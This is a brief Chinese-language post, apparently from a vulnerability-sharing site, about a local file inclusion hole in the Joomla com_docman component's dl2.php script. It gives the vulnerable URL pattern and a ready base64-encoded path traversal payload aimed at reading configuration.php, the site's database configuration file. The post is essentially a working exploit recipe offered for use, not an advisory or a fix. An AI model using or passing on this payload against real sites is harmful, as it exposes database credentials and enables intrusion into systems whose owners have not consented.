本地包含:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
先通过本地包含漏洞查看物理路径,然后在configuration.php 数据库配置文件中,使用base64目录遍历payload
如:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==
暂无评论